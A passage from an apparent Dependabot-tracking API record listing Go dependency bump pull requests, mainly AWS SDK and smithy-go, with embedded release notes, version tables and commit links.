services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.25.0...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/grafana/grafana/pull/124085","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/124085","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/124085/packages"}},{"old_version":"1.50.36","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-05-04T23:25:42.000Z","version_change":"1.50.36 → 1.55.8","issue":{"uuid":"4380348588","node_id":"PR_kwDOFyRkIM7YM-Ql","number":10763,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 42 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-04T23:25:42.000Z","updated_at":"2026-05-04T23:37:00.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":42,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.300.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.2+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.18.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.1","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.10","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.300.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.2+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.18.0` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.10` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca 